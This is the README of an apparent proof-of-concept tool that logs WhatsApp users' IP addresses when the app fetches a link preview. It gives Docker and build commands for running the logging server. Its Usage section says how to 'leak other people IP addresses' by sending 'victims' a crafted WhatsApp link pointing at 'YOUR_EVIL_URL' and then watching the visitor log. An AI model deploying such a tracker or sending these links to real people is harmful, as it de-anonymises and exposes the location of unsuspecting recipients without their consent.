README
¶
WhatsApp user’s IP disclosure with Link Preview
Synopsis
As you know modern messengers have many features besides their main function — texting. They are able to play/record music/videos, send photos/geolocation and so on.
So they are also capable to generate link previews. The best practice is to generate preview by external proxy server which will fetch content for you.
However WhatsApp developers decided to rely on internal web engine that comes with OS.
It's not needed to explain that now WhatsApp will leak your IP address on every received link, and in addition user will leak his IP in link preview mode without actually opening the link.
NOTE: You will need VPS with static IP and domain.
Quickstart - Docker
sudo docker pull unstab1e/whatsippsudo docker run --rm -it -p 80:8080 unstab1e/whatsipp
Setup
- Get the repo by
go get/git clone:
$ go get https://github.com/moldabekov/whatsipp
or
$ git clone https://github.com/moldabekov/whatsipp
-
Build binary:
$ make build -
Run it:
$ sudo W_LEAK_PORT=80 ./main
- If you would like to build and run docker container by yourself please execute the following command on step 3 (docker may require root privileges):
$ make docker
Usage
To test PoC on yourself:
- Open WhatApp client and type your URL (e.g. https://domain.com/leak)
- Check logs to see your leaked IP
To leak other people IP addresses:
- Send this link to your victims: https://api.whatsapp.com/send?phone=+PHONE_NUMBER&text=http%3A%2F%2FYOUR_EVIL_URL
- In separate tab watch IP leaks:
$ tail -f visitors.log
Screenshots
Credits
Greets goes to Rahul Kankrale for figuring things out.
License
(C) MIT License
Documentation
Source Files